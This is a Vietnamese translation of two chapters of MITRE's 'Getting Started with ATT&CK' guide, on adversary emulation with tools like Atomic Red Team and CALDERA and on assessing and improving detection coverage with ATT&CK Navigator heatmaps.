ThreatHunter Playbook: Một kho lưu trữ các chiến lược để tìm kiếm các kỹ thuật ATT&CK trong dữ liệu nhật ký (tức là không phải phân tích, nhưng rất nhiều thông tin để giúp bạn xây dựng phân tích) từ Roberto Rodriguez

Atomic Red Team: Thư viện các bài kiểm tra đội đỏ của Red Canary cho các phân tích của bạn

Detection Lab: Một bộ script để thiết lập một phòng thí nghiệm đơn giản để kiểm tra phân tích bởi Chris Long BOTS: Bộ dữ liệu Boss of the SOC của Splunk, với cả nhiễu nền và các cuộc tấn công của đội đỏ BRAWL: Bộ dữ liệu đội đỏ công khai của MITRE

ATT&CK Navigator: Một công cụ để trực quan hóa dữ liệu trên ma trận ATT&CK, bao gồm cả phạm vi bao phủ phân tích.

Phần 3 Mô phỏng kẻ tấn công và Kiểm tra thâm nhập

Hiểu & Áp Dụng MITRE ATT&CK P3.1 Mô phỏng kẻ tấn công và Kiểm tra thâm nhập

bạn đã dành thời gian để đọc cả Chương 1 về việc bắt đầu sử dụng ATT&CK cho tình báo về mối đe dọa và Chương 2 về sử dụng ATT&CK cho phát hiện và phân tích! Chúng tôi ở đây để mang đến cho bạn chương thứ ba, lần này đề cập đến mô phỏng kẻ tấn công và kiểm tra thâm nhập với ATT&CK để chứng minh cách chúng ta có thể kiểm tra những phân tích mới mà John đã chỉ cho chúng ta cách xây dựng.

Tiếp tục chủ đề của các chương trước, phần này sẽ được chia thành các cấp độ dựa trên mức độ phức tạp của đội bạn và những tài nguyên bạn có thể tiếp cận:

Cấp độ 1 dành cho những người mới bắt đầu có thể không có nhiều tài nguyên Cấp độ 2 dành cho những đội cấp trung bắt đầu trưđng thành Cấp độ 3 dành cho những đội an ninh mạng tiên tiến hơn và có nhiều tài nguyên

Đối với những người không quen thuộc với nó, mô phỏng kẻ tấn công là một loại hoạt động đội đỏ bắt chước một mối đe dọa đã biết đối với một tổ chức bằng cách kết hợp tình báo về mối đe dọa để xác định những hành động và hành vi mà đội đỏ sử dụng. Đây là điều làm cho mô phỏng kẻ tấn công khác với kiểm tra thâm nhập và các hình thức kiểm tra thâm nhập khác.

Những người mô phỏng kẻ tấn công xây dựng một kịch bản để kiểm tra một số khía cạnh nhất định của chiến thuật, kỹ thuật và thủ tục (TTPs) của kẻ tấn công. Sau đó, đội đỏ thực hiện theo kịch bản trong khi hoạt động trên một mạng mục tiêu để kiểm tra cách các biện pháp phòng thủ có thể chống lại kẻ tấn công được mô phỏng.

ATT&CK là một cơ sở kiến thức lớn về các hành vi kẻ tấn công trong thế giới thực, nên không cần nhiều trí tưởng tượng để thấy mối liên hệ giữa hành vi của kẻ tấn công hoặc đội đỏ và ATT&CK. Hãy cùng khám phá cách các đội bảo mật có thể sử dụng ATT&CK để mô phỏng kẻ tấn công nhằm giúp cải thiện tổ chức của họ.

CẤP ĐỘ 1

Các đội nhỏ và những đội chủ yếu tập trung vào phòng thủ có thể nhận được rất nhiều lợi ích từ việc mô phỏng kẻ tấn công ngay cả khi họ không có quyền truy cập vào đội đỏ, vì vậy đừng lo lắng! Có khá nhiều tài nguyên có sẵn để giúp bắt đầu kiểm tra khả năng phòng thủ của bạn với các kỹ thuật phù hợp với ATT&CK. Chúng tôi sẽ nêu bật cách bạn có thể bắt đầu mô phỏng kẻ tấn công bằng cách thử các bài kiểm tra đơn giản.

Atomic Red Team, một dự án mã nguồn mở được duy trì bởi Red Canary, là một bộ sưu tập các tập lệnh có thể được sử dụng để kiểm tra cách bạn có thể phát hiện các kỹ thuật và thủ tục nhất định được ánh xạ tới các kỹ thuật ATT&CK. Ví dụ, có thể bạn đã làm theo lời khuyên trong Chương 1 và xem xét các kỹ thuật được sử dụng bởi APT3 như Network Share Discovery (T1135). Đội tình báo của bạn đã chuyển điều này cho đội phát hiện của bạn và, tuân theo hướng dẫn trong Chương 2, họ đã viết một phân tích hành vi để cố gắng phát hiện nếu một kẻ tấn công thực hiện kỹ thuật này. Nhưng làm thế nào bạn biết liệu bạn có thực sự phát hiện được kỹ thuật đó không?

Atomic Red Team có thể được sử dụng để kiểm tra các kỹ thuật và thủ tục riêng lẻ để xác minh rằng các phân tích hành vi và khả năng giám sát đang hoạt động như mong đợi.

Kho lưu trữ Atomic Red Team có nhiều bài kiểm tra nguyên tử, mỗi bài có một thư mục dành riêng cho kỹ thuật ATT&CK được kiểm tra. Bạn có thể xem toàn bộ kho lưu trữ ở định dạng Ma trận ATT&CK.

Để bắt đầu kiểm tra, hãy chọn trang T1135 để xem chi tiết và các loại bài kiểm tra nguyên tử khác nhau được ghi lại. Mỗi bài kiểm tra này chứa thông tin về kỹ thuật là gì, các nền tảng được hỗ trợ và cách thực hiện bài kiểm tra.

CHI TIẾT BÀI KIỂM TRA NGUYÊN TỬ T1135

Chúng ta thấy có ba tùy chọn kiểm tra và quyết định chọn #2 để kiểm tra bằng dòng lệnh. Vì vậy, chúng ta mở dòng lệnh, sao chép và dán lệnh, thêm vào tên máy tính và thực thi lệnh.

Chúng ta vừa thực hiện bài kiểm tra nguyên tử đầu tiên của mình! Khi thực hiện xong, chúng ta có thể xem xét để xem liệu những gì chúng ta mong đợi phát hiện có phải là những gì chúng ta thực sự phát hiện không. Ví dụ, có thể chúng ta có một phân tích hành vi trong công cụ SIEM của mình lẽ ra phải cảnh báo khi “net view” được thực thi, nhưng chúng ta thấy nó không kích hoạt, vì vậy chúng ta tìm ra rằng nhật ký không được xuất chính xác từ máy chủ của chúng ta. Bạn khắc phục sự cố và sửa vấn đề, và giờ đây bạn đã có một cải tiến đo lường được để giúp bạn có cơ hội tốt hơn để bắt được một kẻ tấn công sử dụng thủ tục này trong tương lai.

Những bài kiểm tra đơn lẻ này cho phép tập trung chính xác vào các kỹ thuật ATT&CK riêng lẻ, điều này làm cho việc xây dựng phạm vi bao phủ phòng thủ dựa trên ATT&CK dễ tiếp cận hơn vì bạn có thể bắt đầu với một bài kiểm tra duy nhất cho một kỹ thuật duy nhất và mở rộng từ đó.

CHU TRÌNH KIỂM TRA NGUYÊN TỬ VỚI ATT&CK

Nội dung Cấp độ 1.5 bổ sung: Đã có quy trình sử dụng Atomic Red Team để thực hiện kiểm tra mô phỏng kẻ tấn công và sẵn sàng cho thứ gì đó có thể giúp kết nối chuỗi chuỗi hành vi? Hãy xem CALDERA tiếp theo! CALDERA là một hệ thống mô phỏng kẻ tấn công tự động được tạo ra bởi MITRE có nhiều hành vi tích hợp được ánh xạ tới các kỹ thuật ATT&CK. Nó cho phép người vận hành chọn một kỹ thuật hoặc kết nối nhiều kỹ thuật lại với nhau khi xây dựng bài kiểm tra, điều này cho phép bạn bắt đầu tự động hóa chuỗi hành vi cho việc kiểm tra của bạn thay vì thực thi thủ công từng Bài kiểm tra nguyên tử đơn lẻ. Bạn có thể sử dụng một trong các kịch bản được tích hợp sẵn hoặc xác định một kịch bản cụ thể hơn bằng cách chọn các thủ tục (được gọi là khả năng trong CALDERA) ánh xạ tới các kỹ thuật ATT&CK nhất định mà bạn muốn kiểm tra.

CẤP ĐỘ 2

Đối với những người trong số các bạn đã có khả năng đội đỏ, bạn có thể nhận được rất nhiều bằng cách tích hợp ATT&CK vào các hoạt động hiện có của mình. Ánh xạ các kỹ thuật được sử dụng trong một hoạt động đội đỏ tới ATT&CK cung cấp một khuôn khổ chung khi viết báo cáo và thảo luận về các biện pháp giảm thiểu.

Để bắt đầu, bạn có thể lấy một hoạt động đã lên kế hoạch hoặc công cụ bạn sử dụng và ánh xạ nó vào ATT&CK. Ánh xạ các thủ tục đội đỏ vào ATT&CK tương tự như ánh xạ tình báo về mối đe dọa vào ATT&CK, vì vậy bạn có thể muốn xem các khuyến nghị của Katie cho một quy trình sáu bước được nêu trong Chương 1.

May mắn thay, đôi khi việc ánh xạ các kỹ thuật có thể đơn giản như tìm kiếm lệnh được sử dụng trên trang web ATT&CK. Ví dụ, nếu chúng ta đã sử dụng lệnh “whoami” trong hoạt động đội đỏ của chúng ta, chúng ta có thể tìm kiếm điều đó trên trang web ATT&CK và thấy rằng hai kỹ thuật có thể áp dụng: System Owner/User Discovery (T1033) và Command-Line Interface (T1059).

CHỨC NĂNG TÌM KIẾM TRÊN HTTPS://ATTACK.MITRE.ORG

Một tài nguyên hữu ích khác để giúp bạn bắt đầu ánh xạ các thủ tục đội đỏ vào ATT&CK là Sổ tay thực địa mô phỏng kẻ tấn công APT3, chia nhỏ các hành động lệnh-theo-lệnh mà APT3 đã sử dụng, tất cả được ánh xạ vào ATT&CK.

TRÍCH ĐOẠN TỪ “SỔ TAY THỰC ĐỊA MÔ PHỎNG KẺ TẤN CÔNG APT3” CỦA CHÚNG TÔI

Nếu đội đỏ của bạn đang sử dụng các công cụ như Cobalt Strike hoặc Empire, tin tốt là—những công cụ này đã được ánh xạ vào ATT&CK. Được trang bị với các lệnh, tập lệnh và công cụ riêng lẻ của bạn được ánh xạ vào ATT&CK, giờ đây bạn có thể lập kế hoạch cho hoạt động của mình.

Một số đội đỏ có bộ công cụ và phương pháp hoạt động đã được thử nghiệm và tin cậy. Họ biết những gì hiệu quả vì nó luôn hiệu quả. Nhưng điều họ không phải lúc nào cũng biết là bao nhiêu TTP đã thử nghiệm và tin cậy của họ trùng lặp (hoặc không!) với các mối đe dọa đã biết có thể nhắm mục tiêu vào tổ chức. Điều đó dẫn đến một khoảng trống trong việc hiểu mức độ hoạt động tốt của các biện pháp phòng thủ để chống lại những gì bạn thực sự đang cố gắng phòng thủ – những kẻ tấn công nhắm mục tiêu vào môi trường của bạn và không nhất thiết phải là chính đội đỏ.

Chúng ta muốn đảm bảo rằng chúng ta không chỉ thực hiện các kỹ thuật vì công cụ của chúng ta có thể thực hiện chúng – chúng ta muốn mô phỏng một kẻ tấn công thực sự mà chúng ta quan tâm để cung cấp giá trị hơn. Ví dụ, chúng ta có thể nói chuyện với đội CTI của mình và họ nói với chúng ta rằng họ lo ngại về việc bị nhắm mục tiêu từ nhóm Iran được biết đến với tên OilRig.

Vì mọi thứ đều được cấu trúc trong ATT&CK, chúng ta có thể sử dụng ATT&CK Navigator để so sánh các kỹ thuật mà chúng ta có thể thực hiện với một công cụ chúng ta đã có, như Cobalt Strike, với các kỹ thuật mà chúng ta biết OilRig đã làm dựa trên báo cáo nguồn mở. (Bạn có thể xem bản demo của Navigator cho thấy cách thực hiện điều này.) Trong hình đồ họa tiếp theo, các kỹ thuật của Cobalt Strike được tô màu đỏ, các kỹ thuật của OilRig được tô màu xanh dương, và các kỹ thuật mà Cobalt Strike có thể thực hiện và OilRig đã sử dụng được tô màu tím.

Những kỹ thuật màu tím này cho chúng ta một điểm khởi đầu để sử dụng một công cụ chúng ta đã có và thực hiện các kỹ thuật là ưu tiên cho tổ chức của chúng ta.

MA TRẬN ATT&CK HIỂN THỊ SỰ TRÙNG LẶP KỸ THUẬT CỦA COBALT STRIKE VÀ OILRIG

Ngoài việc xác định sự trùng lặp giữa Cobalt Strike và OilRig, phân tích này cũng có thể cho thấy những cơ hội để thay đổi hành vi của đội đỏ ngoài những gì họ thường sử dụng xuống đến cấp độ thủ tục.

Có thể có những trường hợp mà một kỹ thuật được triển khai theo một cách cụ thể trong các công cụ mà đội đỏ sử dụng, nhưng một kẻ tấn công không được biết là thực hiện nó theo cách đó. Có kiến thức đó giúp đội đỏ sử dụng các hành vi khác nhau giữa các bài kiểm tra để bao quát tốt hơn những gì các mối đe dọa được biết là làm như một phần của quá trình mô phỏng kẻ tấn công.

Ở thời điểm này, chúng ta cũng có thể thêm vào các kỹ thuật mà chúng ta muốn thực hiện thủ công bằng các lệnh hoặc tập lệnh. Sau đó chúng ta có thể thêm nhận xét vào Navigator về thứ tự chúng ta sẽ thực thi các kỹ thuật và cách chúng ta sẽ thực hiện chúng.

Mặc dù có những lợi ích khi ánh xạ vào ATT&CK khi chúng ta lập kế hoạch cho các hoạt động đội đỏ, chúng ta cũng thu được phần thưởng sau khi đã thực hiện hoạt động của mình khi chúng ta giao tiếp lại với đội xanh của chúng ta. Nếu họ đang ánh xạ phân tích, phát hiện và kiểm soát trở lại ATT&CK, bạn có thể dễ dàng giao tiếp với họ bằng một ngôn ngữ chung về những gì bạn đã làm và những gì họ đã thành công. Đưa một hình ảnh ATT&CK Navigator (và thậm chí một lớp Navigator đã lưu) vào một báo cáo có thể giúp quá trình này và cung cấp cho họ một mẫu để cải thiện.

Nội dung Cấp độ 2.5 bổ sung: Sau khi sử dụng ATT&CK để lập kế hoạch cho các hoạt động và báo cáo kết quả, hãy thử sử dụng Kế hoạch mô phỏng APT3 hoặc kịch bản Đánh giá ATT&CK Vòng 1 dựa trên kế hoạch đó để tiến hành một hoạt động mô phỏng APT3 để cho thấy một bài kiểm tra cơ sở chống lại một nhóm kẻ tấn công cụ thể.

CẤP ĐỘ 3

Đến lúc này, đội đỏ của bạn đang tích hợp ATT&CK vào các hoạt động và tìm thấy giá trị trong việc giao tiếp lại với đội xanh. Để nâng cao hơn nữa các đội của bạn và tác động mà họ đang tạo ra, bạn có thể hợp tác với đội CTI của tổ chức để điều chỉnh các hoạt động hướng tới một kẻ tấn công cụ thể bằng cách sử dụng dữ liệu họ thu thập bằng cách tạo kế hoạch mô phỏng kẻ tấn công của riêng bạn.

Việc tạo kế hoạch mô phỏng kẻ tấn công của riêng bạn dựa vào điểm mạnh nhất của việc kết hợp kiểm tra thâm nhập với tình báo về mối đe dọa của riêng bạn: các hành vi được nhìn thấy từ những kẻ tấn công trong thế giới thực nhắm mục tiêu vào bạn! Đội đỏ có thể biến thông tin tình báo đó thành các bài kiểm tra hiệu quả để cho thấy những biện pháp phòng thủ nào hoạt động tốt và cần nguồn lực ở đâu để cải thiện.

Có một mức độ tác động cao hơn nhiều khi các lỗ hổng về khả năng hiển thị và kiểm soát được phát hiện bởi kiểm tra bảo mật khi bạn có thể cho thấy khả năng cao rằng chúng đã được tận dụng bởi một kẻ tấn công đã biết. Liên kết CTI của riêng bạn với các nỗ lực mô phỏng kẻ tấn công sẽ tăng cả hiệu quả của việc kiểm tra và đầu ra cho lãnh đạo cấp cao để thực hiện thay đổi.

Chúng tôi khuyến nghị một quy trình năm bước được mô tả trong sơ đồ dưới đây để tạo kế hoạch mô phỏng kẻ tấn công, thực hiện hoạt động và thúc đẩy cải tiến phòng thủ. (Để có một phác thảo chi tiết hơn về quy trình, hãy xem bài thuyết trình của Katie Nickels và Cody Thomas về Mô phỏng kẻ tấn công dựa trên mối đe dọa với ATT&CK.)

Hiểu & Áp Dụng MITRE ATT&CK P3.2 Mô phỏng kẻ tấn công và Kiểm tra thâm nhập

BẮT ĐẦU VỚI ATT&CK: Mô phỏng kẻ tấn công và Kiểm tra thâm nhập | Blake Strom, Tim Schulz, và Katie Nickels

  1. Thu thập thông tin tình báo—Chọn một kẻ tấn công dựa trên các mối đe dọa đối với tổ chức của bạn và làm việc với đội CTI để phân tích thông tin tình báo về những gì kẻ tấn công đã làm. Kết hợp những gì dựa trên những gì tổ chức của bạn biết ngoài thông tin tình báo có sẵn công khai để ghi lại các hành vi của kẻ tấn công, những gì họ nhắm mục tiêu, liệu họ thực hiện tấn công nhanh chóng hay từ từ và kín đáo.
  2. Trích xuất kỹ thuật—Theo cách tương tự như bạn đã ánh xạ các hoạt động đội đỏ của mình vào các kỹ thuật ATT&CK, hãy ánh xạ thông tin tình báo bạn có vào các kỹ thuật cụ thể cùng với đội tình báo của bạn. Bạn có thể chỉ cho đội CTI của mình xem Chương 1 để giúp họ học cách làm điều này.
  3. Phân tích & tổ chức—Bây giờ bạn đã có một lượng lớn thông tin tình báo về kẻ tấn công và cách họ hoạt động, hãy vẽ sơ đồ thông tin đó thành luồng hoạt động của họ theo cách dễ dàng để tạo các kế hoạch cụ thể từ đó. Ví dụ, dưới đây là luồng hoạt động mà đội MITRE đã tạo ra cho Kế hoạch mô phỏng kẻ tấn công APT3.

LUỒNG HOẠT ĐỘNG CỦA APT3

  1. Phát triển công cụ và thủ tục—Bây giờ bạn đã biết những gì bạn muốn đội đỏ làm, hãy tìm ra cách triển khai hành vi. Xem xét: Nhóm đe dọa đã sử dụng kỹ thuật này như thế nào? Nhóm có thay đổi kỹ thuật được sử dụng dựa trên bối cảnh môi trường không? Chúng ta có thể sử dụng những công cụ nào để sao chép các TTP này?
  2. Mô phỏng kẻ tấn công—Với một kế hoạch đã có, đội đỏ bây giờ có khả năng thực thi và thực hiện một hoạt động mô phỏng. Như chúng tôi đã khuyến nghị cho tất cả các hoạt động đội đỏ sử dụng ATT&CK, đội đỏ nên làm việc chặt chẽ với đội xanh để có được hiểu biết sâu sắc về những lỗ hổng trong khả năng hiển thị của đội xanh và tại sao chúng tồn tại.

Khi toàn bộ quá trình này diễn ra, các đội đỏ và xanh có thể làm việc với đội CTI để xác định mối đe dọa tiếp theo để lặp lại quy trình, tạo ra một hoạt động liên tục kiểm tra khả năng phòng thủ chống lại các hành vi trong thế giới thực.

TÓM TẮT

Chương này đã cho bạn thấy cách sử dụng ATT&CK cho kiểm tra thâm nhập và mô phỏng kẻ tấn công, bất kể bạn có những tài nguyên gì (kể cả khi bạn chưa có đội đỏ). Chúng tôi hy vọng bạn đã quan sát thấy trong suốt cuốn sách này rằng mỗi chủ đề này xây dựng trên chủ đề khác, với tình báo về mối đe dọa thông báo việc tạo ra các phân tích có thể được xác thực và cải thiện thông qua mô phỏng kẻ tấn công—tất cả trong khi sử dụng ngôn ngữ chung của ATT&CK. Chương tiếp theo (và cuối cùng) sẽ nói về việc thực hiện đánh giá và kỹ thuật với ATT&CK, hoàn thành loạt bài Bắt đầu với ATT&CK của chúng tôi.

Phần 4 Đánh giá và Kỹ thuật

Trong các chương trước, chúng ta đã đề cập đến việc bắt đầu với ATT&CK bằng cách sử dụng nó cho tình báo về mối đe dọa, cho phát hiện và phân tích, và cho mô phỏng kẻ tấn công. Trong phần thứ tư này, chúng ta sẽ nói về đánh giá và kỹ thuật, cho thấy cách bạn có thể sử dụng ATT&CK để đo lường khả năng phòng thủ của mình và cho phép cải thiện. Trong nhiều khía cạnh, chương này xây dựng trên các chương trước đó, vì vậy chúng tôi khuyên bạn nên đọc chúng trước nếu bạn chưa làm.

Để làm cho quá trình này dễ tiếp cận hơn—và tiếp theo các chương khác—chúng tôi đã chia phần này thành ba cấp độ dựa trên mức độ phức tạp và khả năng tiếp cận tài nguyên:

Cấp độ 1 dành cho những người mới bắt đầu có thể không có nhiều tài nguyên Cấp độ 2 dành cho những đội cấp trung bắt đầu trưởng thành Cấp độ 3 dành cho những đội an ninh mạng tiên tiến hơn và có nhiều tài nguyên

Bắt đầu với “đánh giá” có thể nghe có vẻ đáng sợ lúc đầu—ai thích được đánh giá?— nhưng các đánh giá ATT&CK là một phần của một quy trình lớn hơn để cung cấp dữ liệu hữu ích cho các kỹ sư và kiến trúc sư bảo mật để biện minh cho các cải tiến bảo mật dựa trên mối đe dọa:

  1. Đánh giá cách các biện pháp phòng thủ của bạn hiện tại đối phó với các kỹ thuật và kẻ tấn công trong ATT&CK
  2. Xác định những khoảng trống ưu tiên cao nhất trong phạm vi bao phủ hiện tại của bạn
  3. Sửa đổi các biện pháp phòng thủ của bạn – hoặc có được các biện pháp mới – để giải quyết những khoảng trống đó

QUY TRÌNH ĐÁNH GIÁ VÀ KỸ THUẬT

Các cấp độ đánh giá và kỹ thuật là tích lũy và xây dựng dựa trên nhau. Ngay cả khi bạn tự coi mình là một đội an ninh mạng tiên tiến, chúng tôi vẫn khuyến khích bạn bắt đầu ở Cấp độ 1 và đi qua quy trình để dễ dàng tiếp cận một đánh giá lớn hơn.

CẤP ĐỘ 1

Nếu bạn đang làm việc với một đội nhỏ không có quyền truy cập vào nhiều tài nguyên và bạn đang nghĩ đến việc thực hiện một đánh giá đầy đủ, đừng làm điều đó. Ý tưởng ngay lập tức tạo ra một bản đồ nhiệt có mã màu của ma trận ATT&CK để trực quan hóa phạm vi bao phủ của bạn là hấp dẫn nhưng có nhiều khả năng khiến bạn kiệt sức với ATT&CK hơn là phấn khích để sử dụng nó.

Thay vào đó, hãy bắt đầu nhỏ: chọn một kỹ thuật duy nhất để tập trung, xác định phạm vi bao phủ của bạn cho kỹ thuật đó, và sau đó thực hiện các cải tiến kỹ thuật thích hợp để bắt đầu phát hiện nó. Bằng cách bắt đầu như vậy, bạn có thể thực hành cách bạn sẽ chạy một đánh giá lớn hơn.

Mẹo: Không chắc chắn nên bắt đầu với kỹ thuật nào? Hãy xem Chương 1 để biết cách bạn có thể sử dụng ATT&CK và tình báo về mối đe dọa để chọn điểm khởi đầu.

Khi bạn đã chọn được một kỹ thuật, bạn sẽ muốn tìm ra phạm vi bao phủ của bạn đối với kỹ thuật đó là gì. Mặc dù bạn có thể sử dụng tiêu chí riêng của mình, chúng tôi gợi ý bắt đầu với các danh mục phạm vi bao phủ sau:

Các phân tích hiện có của bạn có khả năng phát hiện kỹ thuật; Các phân tích của bạn sẽ không phát hiện kỹ thuật, nhưng bạn đang thu thập các nguồn dữ liệu phù hợp để phát hiện nó; hoặc Bạn hiện không thu thập các nguồn dữ liệu phù hợp để phát hiện kỹ thuật.

Mẹo: Khi mới bắt đầu, hãy giữ các danh mục chấm điểm của bạn đơn giản: Bạn có thể phát hiện nó hay không?

Một cách tuyệt vời để bắt đầu đo lường phạm vi bao phủ là xem xét các phân tích của bạn để xem những kỹ thuật nào chúng có thể đã bao quát. Điều này có thể tốn thời gian, nhưng rất đáng công sức: nhiều SOC đã có các quy tắc và phân tích có thể được ánh xạ trở lại ATT&CK, ngay cả khi chúng ban đầu không được thiết kế để làm như vậy. Thông thường bạn sẽ cần mang vào thông tin khác về kỹ thuật, mà bạn có thể lấy từ trang ATT&CK của kỹ thuật đó hoặc một nguồn bên ngoài.

Ví dụ, giả sử chúng ta đang xem xét Remote Desktop Protocol (T1076) và chúng ta có các cảnh báo sau:

  1. Tất cả lưu lượng mạng qua cổng 22
  2. Tất cả các quy trình được sinh ra bởi AcroRd32.exe
  3. Bất kỳ quy trình nào có tên là tscon.exe
  4. Tất cả lưu lượng mạng nội bộ qua cổng 3389

Nhìn vào trang kỹ thuật ATT&CK cho Remote Desktop Protocol, chúng ta có thể nhanh chóng thấy rằng quy tắc #3 phù hợp với những gì được chỉ định trong phần “phát hiện”. Một tìm kiếm web nhanh cho thấy rằng cổng 3389 – được chỉ định bởi quy tắc #4 – cũng tương ứng với kỹ thuật này.

VĂN BẢN PHÁT HIỆN CHO REMOTE DESKTOP PROTOCOL

Nếu các phân tích của bạn đã bắt được kỹ thuật này, tuyệt vời! Hãy ghi lại phạm vi bao phủ của bạn cho kỹ thuật đó và sau đó chọn một kỹ thuật mới để bắt đầu quá trình lại. Nếu bạn không bao quát nó, hãy xem các nguồn dữ liệu được liệt kê trên trang ATT&CK của kỹ thuật và xác định xem bạn có thể đã thu thập dữ liệu phù hợp để xây dựng một phân tích mới hay không. Nếu có, thì đó chỉ là vấn đề xây dựng một phân tích.

Nhưng nếu bạn không thu thập các nguồn dữ liệu phù hợp, bạn nên làm gì? Đây là nơi kỹ thuật vào cuộc. Hãy xem các nguồn dữ liệu được liệt kê trên trang ATT&CK của kỹ thuật làm điểm khởi đầu có thể và cố gắng đánh giá mức độ khó khăn để bạn bắt đầu thu thập từng nguồn so với hiệu quả của cách bạn có thể sử dụng chúng.

Mẹo: Một nguồn dữ liệu thường được trích dẫn là Windows Event Logs, cung cấp khả năng hiển thị cho nhiều kỹ thuật ATT&CK. Một tài nguyên tốt để bắt đầu với nhật ký sự kiện là Bảng tra cứu ghi nhật ký ATT&CK cho Windows của Malware Archaeology, ánh xạ các sự kiện Windows với các kỹ thuật bạn có thể phát hiện với chúng.

97 TRONG SỐ 244 KỸ THUẬT ATT&CK CÓ THỂ ĐƯỢC PHÁT HIỆN VỚI THAM SỐ DÒNG LỆNH QUÁ TRÌNH, CÓ THỂ ĐƯỢC THU THẬP QUA SỰ KIỆN WINDOWS 4688

Chuyển lên cấp độ tiếp theo: Đừng dừng lại ở một kỹ thuật – thực hiện quy trình này nhiều lần, chọn một kỹ thuật mới (hoặc hai) trên mỗi chiến thuật cho mỗi lần chạy. Theo dõi kết quả của bạn bằng cách sử dụng ATT&CK Navigator, rất tuyệt vời để tạo ra các bản đồ nhiệt về phạm vi bao phủ ATT&CK.

Khi bạn cảm thấy thoải mái với quy trình, hãy thực hiện phân tích nguồn dữ liệu và đưa ra một bản đồ nhiệt về những kỹ thuật nào bạn có thể phát hiện được với các nguồn dữ liệu bạn đang thu thập. Một số tài nguyên có thể giúp bạn bắt đầu ở đây bao gồm dự án ATT&CK Datamap của Olaf Hartong, DeTT&CT, và các script ATT&CK của chính MITRE.

CẤP ĐỘ 2

Khi bạn đã quen thuộc với quy trình này – và có quyền truy cập vào nhiều tài nguyên hơn một chút – bạn sẽ lý tưởng là muốn mở rộng phân tích của mình để bao quát một tập con hợp lý lớn của Ma trận ATT&CK. Ngoài ra, bạn có thể muốn sử dụng một sơ đồ phạm vi bao phủ nâng cao hơn để bây giờ tính đến độ tin cậy của việc phát hiện. Ở đây chúng tôi thích khuyến nghị phân loại phạm vi bao phủ thành độ tin cậy thấp, một số hoặc cao rằng một công cụ hoặc phân tích trong SOC của chúng ta sẽ cảnh báo về kỹ thuật.

MẪU CHO NHỮNG GÌ MỘT ĐÁNH GIÁ CUỐI CÙNG CÓ THỂ TRÔNG GIỐNG

Mẹo: Đừng lo lắng về độ chính xác tuyệt đối khi cố gắng đánh giá phạm vi bao phủ của bạn – mục tiêu của bạn với các đánh giá là hiểu liệu bạn có khả năng kỹ thuật để nói chung phát hiện các kỹ thuật hay không. Để có độ chính xác cao hơn, chúng tôi khuyên bạn nên chạy các bài tập mô phỏng kẻ tấn công , như đã nêu trong Chương 3.

Phạm vi mở rộng này làm cho việc phân tích các phân tích phức tạp hơn một chút: mỗi phân tích bây giờ có thể tiềm năng ánh xạ tới nhiều kỹ thuật khác nhau, trái ngược với chỉ một kỹ thuật từ trước. Ngoài ra, nếu bạn tìm thấy một phân tích bao quát một kỹ thuật cụ thể, thay vì chỉ đánh dấu rằng kỹ thuật đó được bao quát, bạn sẽ muốn tìm ra độ tin cậy phạm vi bao phủ của phân tích đó là gì.

Mẹo: Đối với mỗi phân tích, chúng tôi khuyên bạn nên tìm ra những gì nó đang tập trung vào và xem cách nó ánh xạ trở lại ATT&CK. Ví dụ, bạn có thể có một phân tích xem xét một sự kiện Windows cụ thể; để xác định phạm vi bao phủ của phân tích này, bạn có thể tra cứu ID sự kiện trong Bảng tra cứu ghi nhật ký ATT&CK cho Windows hoặc một kho tương tự. Bạn cũng có thể sử dụng trang web ATT&CK để phân tích các phân tích của mình. Hình dưới đây cho thấy một ví dụ về việc tìm kiếm phát hiện cổng 22, xuất hiện trong kỹ thuật ATT&CK Commonly Used Port.

TÌM KIẾM TRANG ATT&CK CHO CỔNG 22

Một khía cạnh quan trọng khác cần xem xét là các ví dụ về Nhóm và Phần mềm được liệt kê cùng với một kỹ thuật. Những ví dụ này mô tả các thủ tục, hoặc cách cụ thể, một kẻ tấn công đã sử dụng một kỹ thuật. Thường thì chúng đại diện cho các biến thể của một kỹ thuật có thể hoặc không được bao phủ bởi các phân tích hiện có và cũng nên được tính vào đánh giá độ tin cậy về mức độ bao phủ tốt của bạn đối với một kỹ thuật.

PHẦN VÍ DỤ CỦA WINDOWS ADMIN SHARES

Ngoài việc xem xét các phân tích của bạn, bạn cũng sẽ muốn bắt đầu phân tích các công cụ của mình. Để làm điều này, chúng tôi khuyên bạn nên lặp lại từng công cụ – tạo một bản đồ nhiệt riêng biệt cho mỗi cái – và đặt các câu hỏi sau:

Công cụ chạy ở đâu? Tùy thuộc vào nơi một công cụ đang chạy – ví dụ: ở ranh giới hoặc trên từng điểm cuối – nó có thể hoạt động tốt hơn hoặc kém hơn với các chiến thuật cụ thể. Công cụ phát hiện như thế nào? Nó có sử dụng một tập hợp tĩnh các chỉ số “đã biết là xấu” không? Hay nó đang làm điều gì đó dựa trên hành vi? Công cụ giám sát những nguồn dữ liệu nào? Biết các nguồn dữ liệu mà một công cụ giám sát cho phép bạn suy ra những kỹ thuật nào nó có thể phát hiện.

Trả lời những câu hỏi này có thể khó. Không phải tất cả các nhà cung cấp đều công bố loại thông tin này, và thường khi bạn săn tìm nó, bạn sẽ kết thúc bằng việc tìm thấy tài liệu tiếp thị. Hãy cố gắng không dành quá nhiều thời gian để bị sa lầy vào những chi tiết cụ thể, thay vào đó hãy chọn vẽ những nét rộng về các mẫu phạm vi bao phủ chung.

Để tạo một bản đồ nhiệt cuối cùng về phạm vi bao phủ, hãy tổng hợp tất cả các bản đồ nhiệt cho công cụ và phân tích của bạn, ghi lại phạm vi bao phủ cao nhất trên mỗi kỹ thuật.

Như một bước đầu tiên hướng tới việc cải thiện phạm vi bao phủ của bạn, chúng tôi thích khuyến nghị một phiên bản nâng cao hơn của quy trình phát triển phân tích mà chúng tôi đã đề cập trước đây:

  1. Tạo một danh sách các kỹ thuật ưu tiên cao mà bạn muốn tập trung trong ngắn hạn.
  2. Đảm bảo bạn đang thu thập dữ liệu phù hợp để bắt đầu viết phân tích cho các kỹ thuật bạn đang tập trung vào.
  3. Bắt đầu xây dựng phân tích và cập nhật biểu đồ phạm vi bao phủ của bạn.

BẮT ĐẦU VỚI PHẠM VI BAO PHỦ HIỆN TẠI CỦA BẠN, THÊM PHÂN TÍCH VÀ CẬP NHẬT PHẠM VI BAO PHỦ CỦA BẠN TƯƠNG ỨNG

